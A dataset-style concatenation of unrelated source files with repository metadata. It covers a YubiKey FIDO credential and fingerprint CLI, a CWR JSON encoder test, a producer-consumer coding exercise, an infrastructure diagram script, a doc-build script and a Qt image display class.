except CtapError as e:
logger.error("Ctap error", exc_info=e)
_fail_pin_error(ctx, e, "PIN error: %s")
return CredentialManagement(ctap2, client_pin.protocol, token)
@creds.command("list")
@click.pass_context
@click.option("-P", "--pin", help="PIN code.")
def creds_list(ctx, pin):
"""
List credentials.
"""
creds = _init_credman(ctx, pin)
for (rp_id, _, user_id, user_name) in _gen_creds(creds):
click.echo(_format_cred(rp_id, user_id, user_name))
@creds.command("delete")
@click.pass_context
@click.argument("query")
@click.option("-P", "--pin", help="PIN code.")
@click.option("-f", "--force", is_flag=True, help="Confirm deletion without prompting")
def creds_delete(ctx, query, pin, force):
"""
Delete a credential.
\b
QUERY A unique substring match of a credentials RP ID, user ID (hex) or name,
or credential ID.
"""
credman = _init_credman(ctx, pin)
hits = [
(rp_id, cred_id, user_id, user_name)
for (rp_id, cred_id, user_id, user_name) in _gen_creds(credman)
if query.lower() in user_name.lower()
or query.lower() in rp_id.lower()
or user_id.hex().startswith(query.lower())
or query.lower() in _format_cred(rp_id, user_id, user_name)
]
if len(hits) == 0:
cli_fail("No matches, nothing to be done.")
elif len(hits) == 1:
(rp_id, cred_id, user_id, user_name) = hits[0]
if force or click.confirm(
f"Delete credential {_format_cred(rp_id, user_id, user_name)}?"
):
try:
credman.delete_cred(cred_id)
except CtapError as e:
logger.error("Failed to delete resident credential", exc_info=e)
cli_fail("Failed to delete resident credential.")
else:
cli_fail("Multiple matches, make the query more specific.")
@fido.group("fingerprints")
def bio():
"""
Manage fingerprints.
Requires a YubiKey with fingerprint sensor.
Fingerprint management is only available when a FIDO PIN is set on the YubiKey.
\b
Examples:
\b
Register a new fingerprint (providing PIN via argument):
$ ykman fido fingerprints add "Left thumb" --pin 123456
\b
List already stored fingerprints (providing PIN via argument):
$ ykman fido fingerprints list --pin 123456
\b
Delete a stored fingerprint with ID "f691" (PIN will be prompted for):
$ ykman fido fingerprints delete f691
"""
def _init_bio(ctx, pin):
ctap2 = ctx.obj.get("ctap2")
if not ctap2 or "bioEnroll" not in ctap2.info.options:
cli_fail("Biometrics is not supported on this YubiKey.")
pin = _require_pin(ctx, pin, "Biometrics")
client_pin = ClientPin(ctap2)
try:
token = client_pin.get_pin_token(pin, ClientPin.PERMISSION.BIO_ENROLL)
except CtapError as e:
logger.error("Ctap error", exc_info=e)
_fail_pin_error(ctx, e, "PIN error: %s")
return FPBioEnrollment(ctap2, client_pin.protocol, token)
def _format_fp(template_id, name):
return f"{template_id.hex()}{f' ({name})' if name else ''}"
@bio.command("list")
@click.pass_context
@click.option("-P", "--pin", help="PIN code.")
def bio_list(ctx, pin):
"""
List registered fingerprint.
Lists fingerprints by ID and (if available) label.
"""
bio = _init_bio(ctx, pin)
for t_id, name in bio.enumerate_enrollments().items():
click.echo(f"ID: {_format_fp(t_id, name)}")
@bio.command("add")
@click.pass_context
@click.argument("name")
@click.option("-P", "--pin", help="PIN code.")
def bio_enroll(ctx, name, pin):
"""
Add a new fingerprint.
\b
NAME A short readable name for the fingerprint (eg. "Left thumb").
"""
if len(name.encode()) > 15:
ctx.fail("Fingerprint name must be a maximum of 15 characters")
bio = _init_bio(ctx, pin)
enroller = bio.enroll()
template_id = None
while template_id is None:
click.echo("Place your finger against the sensor now...")
try:
template_id = enroller.capture()
remaining = enroller.remaining
if remaining:
click.echo(f"{remaining} more scans needed.")
except CaptureError as e:
logger.error(f"Capture error: {e.code}")
click.echo("Capture failed. Re-center your finger, and try again.")
except CtapError as e:
logger.error("Failed to add fingerprint template", exc_info=e)
if e.code == CtapError.ERR.FP_DATABASE_FULL:
cli_fail(
"Fingerprint storage full. "
"Remove some fingerprints before adding new ones."
)
elif e.code == CtapError.ERR.USER_ACTION_TIMEOUT:
cli_fail("Failed to add fingerprint due to user inactivity.")
cli_fail(f"Failed to add fingerprint: {e.code.name}")
click.echo("Capture complete.")
bio.set_name(template_id, name)
@bio.command("rename")
@click.pass_context
@click.argument("template_id", metavar="ID")
@click.argument("name")
@click.option("-P", "--pin", help="PIN code.")
def bio_rename(ctx, template_id, name, pin):
"""
Set the label for a fingerprint.
\b
ID The ID of the fingerprint to rename (as shown in "list").
NAME A short readable name for the fingerprint (eg. "Left thumb").
"""
if len(name) >= 16:
ctx.fail("Fingerprint name must be a maximum of 15 characters")
bio = _init_bio(ctx, pin)
enrollments = bio.enumerate_enrollments()
key = bytes.fromhex(template_id)
if key not in enrollments:
cli_fail(f"No fingerprint matching ID={template_id}.")
bio.set_name(key, name)
@bio.command("delete")
@click.pass_context
@click.argument("template_id", metavar="ID")
@click.option("-P", "--pin", help="PIN code.")
@click.option("-f", "--force", is_flag=True, help="Confirm deletion without prompting")
def bio_delete(ctx, template_id, pin, force):
"""
Delete a fingerprint.
Delete a fingerprint from the YubiKey by its ID, which can be seen by running the
"list" subcommand.
"""
bio = _init_bio(ctx, pin)
enrollments = bio.enumerate_enrollments()
try:
key: Optional[bytes] = bytes.fromhex(template_id)
except ValueError:
key = None
if key not in enrollments:
# Match using template_id as NAME
matches = [k for k in enrollments if enrollments[k] == template_id]
if len(matches) == 0:
cli_fail(f"No fingerprint matching ID={template_id}")
elif len(matches) > 1:
cli_fail(
f"Multiple matches for NAME={template_id}. "
"Delete by template ID instead."
)
key = matches[0]
name = enrollments[key]
if force or click.confirm(f"Delete fingerprint {_format_fp(key, name)}?"):
try:
bio.remove_enrollment(key)
except CtapError as e:
logger.error("Failed to delete fingerprint template", exc_info=e)
cli_fail(f"Failed to delete fingerprint: {e.code.name}")
| 32.966307
| 88
| 0.608234
|
a1685769cf941052712096ae0b73c9098658b25b
| 13,790
|
py
|
Python
|
tests/parser/cwrjson/encoder/test_json.py
|
orenyodfat/CWR-DataApi
|
f3b6ba8308c901b6ab87073c155c08e30692333c
|
[
"MIT"
] | 37
|
2015-04-21T15:33:53.000Z
|
2022-02-07T00:02:29.000Z
|
tests/parser/cwrjson/encoder/test_json.py
|
orenyodfat/CWR-DataApi
|
f3b6ba8308c901b6ab87073c155c08e30692333c
|
[
"MIT"
] | 86
|
2015-02-01T22:26:02.000Z
|
2021-07-09T08:49:36.000Z
|
tests/parser/cwrjson/encoder/test_json.py
|
orenyodfat/CWR-DataApi
|
f3b6ba8308c901b6ab87073c155c08e30692333c
|
[
"MIT"
] | 27
|
2015-01-26T16:01:09.000Z
|
2021-11-08T23:53:55.000Z
|
# -*- coding: utf-8 -*-
import unittest
import datetime
import json
from cwr.parser.encoder.cwrjson import JSONEncoder
from cwr.file import FileTag, CWRFile
from cwr.group import GroupHeader, GroupTrailer, Group
from cwr.work import WorkRecord
from cwr.agreement import AgreementRecord
from cwr.transmission import TransmissionTrailer, TransmissionHeader, \
Transmission
"""
Group from dictionary encoding tests.
The following cases are tested:
"""
__author__ = 'Bernardo Martínez Garrido'
__license__ = 'MIT'
__status__ = 'Development'
class TestFileJSONEncoding(unittest.TestCase):
def setUp(self):
self._encoder = JSONEncoder()
def test_file_agreement(self):
tag = self._get_file_tag()
transmission = self._get_transmission_agreement()
data = CWRFile(tag, transmission)
encoded = self._encoder.encode(data)
expected = json.loads(
'{"transmission": {"header": {"creation_date_time": "2003-02-16", "sender_name": "SENDER", "sender_id": "ABC334", "sender_type": "SO", "record_type": "HDR", "edi_standard": "01.10", "transmission_date": "2003-02-17", "character_set": "ASCII"}, "groups": [{"group_trailer": {"record_count": 20, "record_type": "GRT", "group_id": 3, "transaction_count": 15, "currency_indicator": null, "total_monetary_value": null}, "transactions": [[{"sales_manufacture_clause": "M", "date_of_signature": "2003-02-17", "prior_royalty_start_date": "2003-02-19", "advance_given": true, "retention_end_date": "2003-02-18", "international_standard_code": "DFG135", "prior_royalty_status": "D", "agreement_end_date": "2003-02-16", "record_type": "AGR", "shares_change": true, "post_term_collection_status": "D", "agreement_type": "OS", "submitter_agreement_n": "AB12", "society_assigned_agreement_n": "DF35", "record_sequence_n": 15, "agreement_start_date": "2003-02-15", "transaction_sequence_n": 3, "post_term_collection_end_date": "2003-02-20", "number_of_works": 12}], [{"sales_manufacture_clause": "M", "date_of_signature": "2003-02-17", "prior_royalty_start_date": "2003-02-19", "advance_given": true, "retention_end_date": "2003-02-18", "international_standard_code": "DFG135", "prior_royalty_status": "D", "agreement_end_date": "2003-02-16", "record_type": "AGR", "shares_change": true, "post_term_collection_status": "D", "agreement_type": "OS", "submitter_agreement_n": "AB12", "society_assigned_agreement_n": "DF35", "record_sequence_n": 15, "agreement_start_date": "2003-02-15", "transaction_sequence_n": 3, "post_term_collection_end_date": "2003-02-20", "number_of_works": 12}]], "group_header": {"record_type": "GRH", "version_number": "02.10", "group_id": 3, "batch_request_id": 15, "transaction_type": "AGR"}}, {"group_trailer": {"record_count": 20, "record_type": "GRT", "group_id": 3, "transaction_count": 15, "transaction_count": 15, "currency_indicator": null, "total_monetary_value": null}, "transactions": [[{"sales_manufacture_clause": "M", "date_of_signature": "2003-02-17", "prior_royalty_start_date": "2003-02-19", "advance_given": true, "retention_end_date": "2003-02-18", "international_standard_code": "DFG135", "prior_royalty_status": "D", "agreement_end_date": "2003-02-16", "record_type": "AGR", "shares_change": true, "post_term_collection_status": "D", "agreement_type": "OS", "submitter_agreement_n": "AB12", "society_assigned_agreement_n": "DF35", "record_sequence_n": 15, "agreement_start_date": "2003-02-15", "transaction_sequence_n": 3, "post_term_collection_end_date": "2003-02-20", "number_of_works": 12}], [{"sales_manufacture_clause": "M", "date_of_signature": "2003-02-17", "prior_royalty_start_date": "2003-02-19", "advance_given": true, "retention_end_date": "2003-02-18", "international_standard_code": "DFG135", "prior_royalty_status": "D", "agreement_end_date": "2003-02-16", "record_type": "AGR", "shares_change": true, "post_term_collection_status": "D", "agreement_type": "OS", "submitter_agreement_n": "AB12", "society_assigned_agreement_n": "DF35", "record_sequence_n": 15, "agreement_start_date": "2003-02-15", "transaction_sequence_n": 3, "post_term_collection_end_date": "2003-02-20", "number_of_works": 12}]], "group_header": {"record_type": "GRH", "version_number": "02.10", "group_id": 3, "batch_request_id": 15, "transaction_type": "AGR"}}], "trailer": {"record_type": "TRL", "group_count": 155, "record_count": 568, "transaction_count": 245}}, "tag": {"sequence_n": 123, "receiver": "RCV", "sender": "SND", "version": 2.1, "year": 2015}}')
self.maxDiff = None
self.assertEqual(expected, json.loads(encoded))
def test_file_work_with_nones(self):
tag = self._get_file_tag()
transmission = self._get_transmission_work()
data = CWRFile(tag, transmission)
encoded = self._encoder.encode(data)
expected = json.loads(
'{"transmission": {"header": {"creation_date_time": "2003-02-16", "sender_name": "SENDER", "sender_id": "ABC334", "sender_type": "SO", "record_type": "HDR", "edi_standard": "01.10", "transmission_date": "2003-02-17", "character_set": "ASCII"}, "groups": [{"group_trailer": {"record_count": 20, "record_type": "GRT", "group_id": 3, "transaction_count": 15, "currency_indicator": null, "total_monetary_value": null}, "transactions": [[{"opus_number": "OP35", "recorded_indicator": "Y", "contact_id": "123CONTACT", "record_sequence_n": 15, "music_arrangement": "ORI", "language_code": "ES", "duration": "01:12:00", "contact_name": "THE CONTACT", "composite_type": "MED", "lyric_adaptation": "MOD", "title": "TITLE", "transaction_sequence_n": 3, "excerpt_type": "MOV", "submitter_work_n": "ABC123", "priority_flag": "Y", "copyright_number": "ABDF146", "text_music_relationship": "MTX", "work_type": "BL", "grand_rights_indicator": true, "date_publication_printed_edition": "2003-02-16", "musical_work_distribution_category": "SER", "catalogue_number": "GGH97", "composite_component_count": 5, "exceptional_clause": "Y", "record_type": "NWR", "iswc": null, "version_type": "ORI", "copyright_date": "2003-02-17"}]], "group_header": {"record_type": "GRH", "version_number": "02.10", "group_id": 3, "batch_request_id": 15, "transaction_type": "NWR"}}], "trailer": {"record_type": "TRL", "group_count": 155, "record_count": 568, "transaction_count": 245}}, "tag": {"sequence_n": 123, "receiver": "RCV", "sender": "SND", "version": 2.1, "year": 2015}}')
self.assertEqual(expected, json.loads(encoded))
def _get_file_tag(self):
return FileTag(year=2015,
sequence_n=123,
sender='SND',
receiver='RCV',
version=2.1)
def _get_transmission_agreement(self):
header = TransmissionHeader(record_type='HDR',
sender_id='ABC334',
sender_name='SENDER',
sender_type='SO',
creation_date_time=datetime.datetime.strptime(
'20030216', '%Y%m%d').date(),
transmission_date=datetime.datetime.strptime(
'20030217', '%Y%m%d').date(),
edi_standard='01.10',
character_set='ASCII')
trailer = TransmissionTrailer(record_type='TRL',
group_count=155,
transaction_count=245,
record_count=568)
groups = [self._get_group_agreement(), self._get_group_agreement()]
return Transmission(header, trailer, groups)
def _get_transmission_work(self):
header = TransmissionHeader(record_type='HDR',
sender_id='ABC334',
sender_name='SENDER',
sender_type='SO',
creation_date_time=datetime.datetime.strptime(
'20030216', '%Y%m%d').date(),
transmission_date=datetime.datetime.strptime(
'20030217', '%Y%m%d').date(),
edi_standard='01.10',
character_set='ASCII')
trailer = TransmissionTrailer(record_type='TRL',
group_count=155,
transaction_count=245,
record_count=568)
groups = [self._get_group_work()]
return Transmission(header, trailer, groups)
def _get_group_agreement(self):
header = GroupHeader(record_type='GRH',
group_id=3,
transaction_type='AGR',
version_number='02.10',
batch_request_id=15)
trailer = GroupTrailer(record_type='GRT',
group_id=3,
transaction_count=15,
record_count=20)
transactions = [self._get_transaction_agreement(),
self._get_transaction_agreement()]
return Group(header, trailer, transactions)
def _get_group_work(self):
header = GroupHeader(record_type='GRH',
group_id=3,
transaction_type='NWR',
version_number='02.10',
batch_request_id=15)
trailer = GroupTrailer(record_type='GRT',
group_id=3,
transaction_count=15,
record_count=20)
transactions = [self._get_transaction_work()]
return Group(header, trailer, transactions)
def _get_transaction_agreement(self):
return [self._get_agreement()]
def _get_transaction_work(self):
return [self._get_work()]
def _get_agreement(self):
return AgreementRecord(record_type='AGR',
transaction_sequence_n=3,
record_sequence_n=15,
submitter_agreement_n='AB12',
agreement_type='OS',
agreement_start_date=datetime.datetime.strptime(
'20030215', '%Y%m%d').date(),
number_of_works=12,
prior_royalty_status='D',
post_term_collection_status='D',
international_standard_code='DFG135',
society_assigned_agreement_n='DF35',
sales_manufacture_clause='M',
agreement_end_date=datetime.datetime.strptime(
'20030216', '%Y%m%d').date(),
date_of_signature=datetime.datetime.strptime(
'20030217', '%Y%m%d').date(),
retention_end_date=datetime.datetime.strptime(
'20030218', '%Y%m%d').date(),
prior_royalty_start_date=datetime.datetime.strptime(
'20030219', '%Y%m%d').date(),
post_term_collection_end_date=datetime.datetime.strptime(
'20030220', '%Y%m%d').date(),
shares_change=True,
advance_given=True)
def _get_work(self):
return WorkRecord(record_type='NWR',
transaction_sequence_n=3,
record_sequence_n=15,
submitter_work_n='ABC123',
title='TITLE',
version_type='ORI',
musical_work_distribution_category='SER',
date_publication_printed_edition=datetime.datetime.strptime(
'20030216', '%Y%m%d').date(),
text_music_relationship='MTX',
language_code='ES',
copyright_number='ABDF146',
copyright_date=datetime.datetime.strptime('20030217',
'%Y%m%d').date(),
music_arrangement='ORI',
lyric_adaptation='MOD',
excerpt_type='MOV',
composite_type='MED',
composite_component_count=5,
iswc=None,
work_type='BL',
duration=datetime.datetime.strptime('011200',
'%H%M%S').time(),
catalogue_number='GGH97',
opus_number='OP35',
contact_id='123CONTACT',
contact_name='THE CONTACT',
recorded_indicator='Y',
priority_flag='Y',
exceptional_clause='Y',
grand_rights_indicator=True)
class TestFileJSONEncodingInvalid(unittest.TestCase):
def setUp(self):
self._encoder = JSONEncoder()
def test_none(self):
self.assertRaises(AttributeError, self._encoder.encode, None)
def test_string(self):
self.assertRaises(AttributeError, self._encoder.encode, 'abc')
| 66.941748
| 3,591
| 0.563452
|
cc56af1446ad3ceab11d0197cc59188fec8450e2
| 3,282
|
py
|
Python
|
CodingTest_30102020/Live Coding Test Solution.py
|
indranildchandra/Practice-Problems
|
3b9b6092c63fee52c289e2b3f26bf03b918bacc8
|
[
"Apache-2.0"
] | null | null | null |
CodingTest_30102020/Live Coding Test Solution.py
|
indranildchandra/Practice-Problems
|
3b9b6092c63fee52c289e2b3f26bf03b918bacc8
|
[
"Apache-2.0"
] | null | null | null |
CodingTest_30102020/Live Coding Test Solution.py
|
indranildchandra/Practice-Problems
|
3b9b6092c63fee52c289e2b3f26bf03b918bacc8
|
[
"Apache-2.0"
] | 1
|
2022-01-24T18:36:51.000Z
|
2022-01-24T18:36:51.000Z
|
## Design push and pull APIs for a producer consumer system with N producers and M consumers conforming to the following definitions:
#
# # Push(Key, Payload);
# # Push need not have consecutive keys. But keys pushed are monotonically increasing.
#
# # Payload Pull(Key);
# # Pull can be for any seq/key number.
# # If the seq number is not found, return the payload for the immediate next higher sequence number.
# # If there is no next higher seq num, return null.
#
# # Container has a fixed amount of memory.
# When the container is full, you can delete the lowest sequence number.
# # Once an item is pulled, it is unavailable for other pulls and can be discarded by the container
## capacity = 3
## push (1, "value1")
## push (3, "value3")
## push (5, "value5")
## pull (2) => "value3"
## push (10, "value10")
## push (15, "value15") => deletion of (1, "value")
import traceback
from collections import OrderedDict
class PubSub():
def __init__(self, container_size):
self.capacity = container_size
self.message_stack = OrderedDict()
def find_cross_over(self, arr, low, high, x):
if (arr[high] <= x):
return high
if (arr[low] > x):
return low
mid = (low + high) // 2
if (arr[mid] <= x and arr[mid + 1] > x):
return mid
if(arr[mid] < x):
return self.find_cross_over(arr, mid + 1, high, x)
return self.find_cross_over(arr, low, mid - 1, x)
def get_K_closest(self, arr, x, k, n):
l = self.find_cross_over(arr, 0, n - 1, x)
r = l + 1
count = 0
candidate_elements = list()
if (arr[l] == x) :
l -= 1
while (l >= 0 and r < n and count < k) :
if (x - arr[l] < arr[r] - x):
# print(arr[l], end = " ")
candidate_elements.append(arr[l])
l -= 1
else:
# print(arr[r], end = " ")
candidate_elements.append(arr[r])
r += 1
count += 1
while (count < k and l >= 0):
# print(arr[l], end = " ")
candidate_elements.append(arr[l])
l -= 1
count += 1
while (count < k and r < n):
# print(arr[r], end = " ")
candidate_elements.append(arr[r])
r += 1
count += 1
return candidate_elements
def push(self, key, payload):
try:
if len(self.message_stack) < self.capacity:
self.message_stack[key] = payload
else:
self.message_stack.pop(0)
self.message_stack[key] = payload
return 1
except:
print(traceback.format_exc())
return 0
def pull(self, lookup_key):
try:
# payload = self.message_stack.get(lookup_key) or self.message_stack[min(self.message_stack.keys(), key = lambda key: abs(lookup_key-key))]
if lookup_key in self.message_stack.keys():
payload = self.message_stack.get(lookup_key)
del self.message_stack[lookup_key]
elif lookup_key > max(self.message_stack.keys()):
payload = None
elif lookup_key < min(self.message_stack.keys()):
nearest_key = min(self.message_stack.keys())
payload = self.message_stack.get(nearest_key)
del self.message_stack[nearest_key]
else:
nearest_key = max(self.get_K_closest(list(self.message_stack.keys()), lookup_key, 2, len(self.message_stack.keys())))
payload = self.message_stack.get(nearest_key)
del self.message_stack[nearest_key]
return payload, True
except:
print(traceback.format_exc())
return None, False
| 29.567568
| 142
| 0.654479
|
8ee27bfb8974fc475990548c7403f819e289ae55
| 2,266
|
py
|
Python
|
data/infrastructure.py
|
jesmigel/jc_diagrams
|
fd87174451d95991e0c538bf9256bbfdf9f0538c
|
[
"MIT"
] | null | null | null |
data/infrastructure.py
|
jesmigel/jc_diagrams
|
fd87174451d95991e0c538bf9256bbfdf9f0538c
|
[
"MIT"
] | null | null | null |
data/infrastructure.py
|
jesmigel/jc_diagrams
|
fd87174451d95991e0c538bf9256bbfdf9f0538c
|
[
"MIT"
] | null | null | null |
from diagrams import Cluster, Diagram
from diagrams.onprem.network import Nginx
from diagrams.oci.security import IDAccess
from diagrams.programming.language import Php, Go
from diagrams.onprem.vcs import Gitlab
from diagrams.generic.storage import Storage
from diagrams.generic.virtualization import Vmware
from diagrams.onprem.iac import Terraform
from diagrams.onprem.ci import Jenkins
from diagrams.generic.os import Ubuntu
from diagrams.oci.storage import FileStorage
from diagrams.generic.network import Switch
with Diagram("infrastructure", show=False):
switch = Switch("FM Switch")
with Cluster("Platform Controller"):
# NGINX
proxy = Nginx("NGINX proxy")
# IAM
with Cluster("IAM"):
# OpenLDAP
ldap = IDAccess("OpenLDAP")
# ldap-user-manager
ldap_gui = Php("ldap-user-manager")
repo = [
Storage("Portainer"),
Gitlab("Gitlab"),
Storage("Nexus")
]
# Jenkins
ci = Jenkins("Jenkins")
# LDAP DEPENDENCY
ldap_gui << ldap
repo << ldap
ci << ldap
# PUBLIC FACING PROXY
ldap_gui << proxy
repo << proxy
ci << proxy
with Cluster("File Storage Host"):
nfsv4 = [
FileStorage("ESXI Datastore"),
FileStorage("Packer RAW images"),
FileStorage("Controller configuration and Data files")
]
ci << repo
repo << nfsv4[2]
proxy << nfsv4[2]
switch << proxy
with Cluster("ESXI Host"):
# ESXI Host
esxi = Vmware("ESXI")
# Terraform
tf = Terraform("Terraform")
tf << ci
with Cluster("K8s (Kubespray) - Ubuntu VM's"):
control = Ubuntu("Control plane")
control - Ubuntu("Worker")
with Cluster("OpenStack - Ubuntu VM's"):
openstack = Ubuntu("DevStack")
# ESXI external interactions
esxi << tf
esxi << proxy
esxi << nfsv4[0]
esxi << repo[0]
# K8s interaction with controller
control << repo
control << esxi
# K8s interaction with controller
openstack << repo
openstack << esxi
| 24.106383
| 66
| 0.582083
|
2c59032b74e1c42e1522ee3ac5302b007d22ba72
| 806
|
py
|
Python
|
libs/external_libs/simplejson-1.9.1/scripts/make_docs.py
|
google-code-export/django-hotclub
|
d783a5bbcc06816289565f3eae6d99461188ca4a
|
[
"MIT"
] | 3
|
2015-12-25T14:45:36.000Z
|
2016-11-28T09:58:03.000Z
|
libs/external_libs/simplejson-1.9.1/scripts/make_docs.py
|
indro/t2c
|
56482ad4aed150f29353e054db2c97b567243bf8
|
[
"MIT"
] | null | null | null |
libs/external_libs/simplejson-1.9.1/scripts/make_docs.py
|
indro/t2c
|
56482ad4aed150f29353e054db2c97b567243bf8
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import os
import subprocess
import shutil
PROJECT='simplejson'
def _get_version():
from pkg_resources import PathMetadata, Distribution
egg_info = PROJECT + '.egg-info'
base_dir = os.path.dirname(egg_info)
metadata = PathMetadata(base_dir, egg_info)
dist_name = os.path.splitext(os.path.basename(egg_info))[0]
dist = Distribution(base_dir, project_name=dist_name, metadata=metadata)
return dist.version
VERSION = _get_version()
PUDGE = '/Library/Frameworks/Python.framework/Versions/2.4/bin/pudge'
#PUDGE = 'pudge'
res = subprocess.call([
PUDGE, '-v', '-d', 'docs', '-m', PROJECT,
'-l', '%s %s' % (PROJECT, VERSION),
'--theme=green'
])
if not res:
shutil.copyfile('docs/module-simplejson.html', 'docs/index.html')
raise SystemExit(res)
| 27.793103
| 76
| 0.700993
|
c4a8070c18d7b5b6c6586d90d5af500260636e69
| 10,081
|
py
|
Python
|
dltb/thirdparty/qt.py
|
Petr-By/qtpyvis
|
0b9a151ee6b9a56b486c2bece9c1f03414629efc
|
[
"MIT"
] | 3
|
2017-10-04T14:51:26.000Z
|
2017-10-22T09:35:50.000Z
|
dltb/thirdparty/qt.py
|
CogSciUOS/DeepLearningToolbox
|
bf07578b9486d8c48e25df357bc4b9963b513b46
|
[
"MIT"
] | 13
|
2017-09-05T12:56:11.000Z
|
2017-11-22T10:38:27.000Z
|
dltb/thirdparty/qt.py
|
CogSciUOS/DeepLearningToolbox
|
bf07578b9486d8c48e25df357bc4b9963b513b46
|
[
"MIT"
] | 2
|
2017-09-24T21:39:42.000Z
|
2017-10-04T15:29:54.000Z
|
"""Implementation of abstract classes using the Qt library
(module `PyQt5`).
"""
# https://stackoverflow.com/questions/12718296/is-there-a-way-to-use-qt-without-qapplicationexec
# FIXME[todo]: the @protect decorator catches KeyboardInterrupt - this is
# not desirable if not run from Qt main event loop but some other
# context, if we would actually be interested in these exceptions (and
# maybe also others!)
# standard imports
from typing import Callable, Tuple
import time
import logging
import threading
# third party imports
import numpy as np
from PyQt5.QtCore import Qt, QThread, QTimer, pyqtSlot
from PyQt5.QtGui import QKeyEvent, QCloseEvent, QHideEvent
from PyQt5.QtWidgets import QApplication
# toolbox imports
from qtgui.widgets.image import QImageView
from ..base.image import Image, Imagelike, ImageDisplay as BaseImageDisplay
# logging
LOG = logging.getLogger(__name__)
class QImageDisplay(QImageView):
def __init__(self, application: QApplication = None, **kwargs) -> None:
super().__init__(**kwargs)
self._application = application
self._thread = None
if self._application is not None:
self._application.aboutToQuit.connect(self.onAboutToQuit)
def closeEvent(self, event: QCloseEvent) -> None:
"""This event handler is called with the given event when Qt receives
a window close request for a top-level widget from the window
system.
By default, the event is accepted and the widget is
closed. You can reimplement this function to change the way
the widget responds to window close requests. For example, you
can prevent the window from closing by calling ignore() on all
events.
In other words: If you do not want your widget to be hidden,
or want some special handling, you should reimplement the
event handler and ignore() the event.
"""
# event.ignore()
LOG.info("QImageDisplay.closeEvent: accepted: %s", event.isAccepted())
def hideEvent(self, event: QHideEvent) -> None:
"""Hide events are sent to widgets immediately after they have been
hidden.
"""
LOG.info("QImageDisplay.hideEvent: display was hidden")
self._application.quit()
def keyPressEvent(self, event: QKeyEvent) -> None:
"""This event handler, for event event, can be reimplemented in a
subclass to receive key press events for the widget.
We add handling of 'Esc' and 'Q' to close the window.
"""
key = event.key()
if key in (Qt.Key_Q, Qt.Key_Escape) and self._application is not None:
self._application.quit()
else:
super().keyPressEvent(event)
@pyqtSlot()
def onAboutToQuit(self) -> None:
"""A slot to be connected to the QApplicaton.aboutToQuit signal.
It will inform this :py:class:`QImageDisplay` that the main
event loop of the application is about to finish.
This will not automatically close (hide) the
:py:class:`QImageDisplay`.
"""
LOG.info("QImageDisplay.onAboutToQuit: application.aboutToQuit")
@pyqtSlot()
def onTimer(self) -> None:
"""Slot to connect the `timeout` signal of a :py:class:`QTimer`.
If a :py:class:`QApplication` is connected with this
:py:class:`QImageDisplay`, its main event loop will be stopped.
"""
if self._application is not None:
self._application.quit()
class ImageDisplay(BaseImageDisplay):
"""An image display that uses Qt Widgets to display an image.
The :py:class:`ImageDisplay` can be used in different modes.
In standard mode, the widget is shown once the :py:meth:`show`
method is called. No seperate Qt event loop is spawn and if
non such loop exists, repaint events are processed explicitly
in the current thread. In that situation, the graphical user
interface shows the image, but it will be unresponsive (for example,
pressing the window close button will have no effect).
There is also a :py:class:`run` method that starts the Qt main
event loop in the current thread and spawns a background QThread
to run a worker. The worker can update the :py:class:`ImageDisplay`
by calling the :py:class:`show` method.
This mode requires a bit more effort on side of the caller
(definition of a worker function), but it should guarantee a
resoponsive user interface.
Attributes
----------
_view: QImageView
A widget to display the image.
_thread: QThread
A thread running either the main event loop or a background
worker (depending ont the mode of the display).
If this is not None, a main event loop is running.
_application: QApplication
A application that will be started to get an responsive user
interface. This can only be done from the Python main thread,
and the event loop will then occupy this thread.
"""
def __init__(self, view: QImageView = None, **kwargs) -> None:
"""
"""
super().__init__(**kwargs)
self._application = QApplication([])
self._view = view or QImageDisplay(self._application)
def _show(self, image: np.ndarray, title: str = None, **kwargs) -> None:
"""Show the given image.
Arguments
---------
image: Imagelike
The image to display.
title: str
A title to be displayed as image title.
"""
# Setting the image for _view will trigger a paintEvent
# (via _view.update()) which we have to make sure is processed
# for the image to become visible.
self._view.setImage(image)
title = "Qt" if title is None else f"Qt: {title}"
self._view.setWindowTitle(title)
def _open(self) -> None:
LOG.info("Qt: open: show the window")
self._view.show()
if self._blocking is None:
# Make sure the the showEvent is processed.
#
# There seems to be some timing aspect to this: just
# calling _application.processEvents() seems to be too
# fast, we have to wait a bit otherwise _view.setData may
# not have triggered the paintEvent. This does only occur
# sometimes and I have no idea how long to wait or how to
# check if the situation is fine (interestingly it seems
# not to matter if we wait before or after calling
# _application.processEvents()).
time.sleep(0.1)
self._process_events()
# time.sleep(0.1)
LOG.debug("Qt: open: done.")
def _close(self) -> None:
LOG.info("Qt: close: hide the window")
self._view.hide()
if not self.event_loop_is_running():
self._process_events()
LOG.debug("Qt: close: done.")
def _run_blocking_event_loop(self, timeout: float = None) -> None:
"""Start the main event loop for this :py:class:`ImageDisplay`.
"""
LOG.info("Running Qt Main Event Loop.")
# Run the Qt main event loop to update the display and
# process timeout and/or key events.
if self.event_loop_is_running():
raise RuntimeError("Only one background thread is allowed.")
self._event_loop = QThread.currentThread()
if timeout is not None:
milliseconds = int(timeout * 1000)
timer = QTimer()
timer.setInterval(milliseconds)
timer.setSingleShot(True)
timer.timeout.connect(self._view.onTimer)
timer.start()
LOG.debug("Starting Qt Main Event Loop (exec_)")
self._application.exec_()
LOG.debug("Qt Main Event Loop (exec_) has ended.")
if timeout is not None:
timer.stop()
timer.timeout.disconnect(self._view.onTimer)
self._event_loop = None
LOG.info("Qt Main Event Loop finished (event loop=%s, closed=%s).",
self.event_loop_is_running(), self.closed)
def _run_nonblocking_event_loop(self) -> None:
# FIXME[hack]: calling _process_events from a background task
# seems to have no effect for Qt. It seems that it really has
# to be called from the main thread!
# Hence we do not start a background thread here but instead
# call process_events once. This will not result in a smooth
# interface, but at least it will show the images.
self._process_events()
def _process_events(self) -> None:
"""Process events for the graphical user interface of
this :py:class:`ImageDisplay`. Pending events are processed
in a blocking mode.
Note: Qt requires that event processing is run in the main
thread.
"""
self._application.processEvents()
# FIXME[hack]: when running without an event loop (and even when
# setting blocking=False and using explicit event processing),
# we seem to be not notified when the window is closed (by clicking
# the window decoration close button).
# Hence we adapt opened and closed to explicitly check
# the status of the window. A future implementation should
# improve this in several directions:
# - check why we are not informed (we probably need some event handler)
# - it seems suboptimal to have to adapt both methods
# (opened and closed)- just changing one should be enough
# -> redesign the class ...
@property
def opened(self) -> bool:
"""Check if this image :py:class:`Display` is opened, meaning
the display window is shown and an event loop is running.
"""
return self._view.isVisible() and self._opened
@property
def closed(self) -> bool:
"""Check if this image :py:class:`Display` is closed, meaning
that no window is shown (and no event loop is running).
"""
return not self._view.isVisible() or not self._opened
| 39.073643
| 96
